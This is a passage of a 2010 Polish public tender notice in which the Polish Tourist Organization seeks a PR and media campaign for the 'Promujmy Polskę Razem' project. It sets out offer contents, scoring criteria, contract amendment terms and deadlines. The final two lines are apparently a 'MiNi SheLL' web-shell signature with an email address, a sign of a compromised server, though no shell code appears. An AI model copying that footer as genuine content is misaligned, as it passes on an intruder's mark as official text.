o udzielenie zamówienia), określające jego zakres (art. 23 ustawy Prawo zamówień publicznych) - w formie oryginału podpisanego przez wszystkich Wykonawców biorących udział w postępowaniu o udzielenie niniejszego zamówienia publicznego lub kopii poświadczona za zgodność z oryginałem przez notariusza - jeżeli dotyczy,
4) opis i propozycje działań w zakresie wymienionym w punkcie III SIWZ, w tym:
a) koncepcję kampanii promocyjnej w Polsce skierowanej do polskich mediów, która będzie miała na celu dotarcie do jak największej liczby Polaków z informacją o Projekcie Promujmy Polskę Razem i prowadzonych przez Polską Organizację Turystyczną działań w ramach Projektu w kraju i za granicą, 
b) koncepcję działań z zakresu relacji z mediami i krótkim opisem wszystkich wymaganych w SIWZ 20 działań innych niż konferencje prasowe i briefingi,
c) plan działań public relations w Polsce na rzecz Projektu Promujmy Polskę Razem z krótkim opisem wszystkich wymaganych w SIWZ konferencji, briefingów i imprez promocyjnych z udziałem osób medialnych (przyciągających uwagę mediów)
d) koncepcja strony www.promujmypolskerazem.pl</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Kreatywność i różnorodność rozwiązań komunikacji z mediami - 15</li>
<li>3 - Liczba imprez promocyjnych, udział osób medialnych (przyciągających uwagę mediów) - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony dopuszczają możliwość zmiany niniejszej umowy zgodnie z art. 144 ustawy Prawo zamówień publicznych.
2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia , co najmniej jednej z poniższych okoliczności:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy,
b) zmiana ustawodawstwa powodująca zmianę obowiązującej stawki podatku VAT lub powodująca konieczność zmiany w przedmiocie umowy,
c) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
d) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym, a innym niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach, którego realizowane jest przedmiotowe zamówienie,
e) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń dotyczących Programu Operacyjnego Innowacyjna Gospodarka w szczególności w zakresie sprawozdawczości,
f) wystąpi niezależna od Zamawiającego konieczność rezygnacji z części przedmiotu zamówienia np. w przypadku braku środków finansowych na kontynuowanie umowy
3. Wszystkie postanowienia zawarte w pkt. 2 stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
4. Za siłę wyższą, o której mowa w pkt. 2 lit. a, która uwalnia strony od wypełnienia zobowiązania niniejszej umowy na czas jej trwania, uznaje się nieprzewidziane wydarzenia, które występują niezależnie od stron i po zawarciu niniejszej umowy, a którym strona nie będzie mogła zapobiec przy zastosowaniu należytej staranności, udaremniające całkowicie lub częściowo wypełnienie zobowiązań umowy, jak np. pożar,  powódź, trzęsienie ziemi, strajk, wojna, mobilizacja, działania wojenne, embargo lub zarządzenie władz. Nie uznaje się za siłę wyższą braku siły roboczej, materiałów, surowców, chyba że jest to spowodowane siłą wyższą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. pot.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Organizacja Turystyczna,ul. Chałubińskiego 8, 00-613 Warszawa,
adres e-mail: mariola.siwek@pot.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 12:00, miejsce: Polska Organizacja Turystyczna, ul. Chałubińskiego 8, 00-613 Warszawa, Sekretariat (XIX piętro)
Za termin złożenia oferty przyjmuje się dzień i godzinę zarejestrowania w sekretariacie POT..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com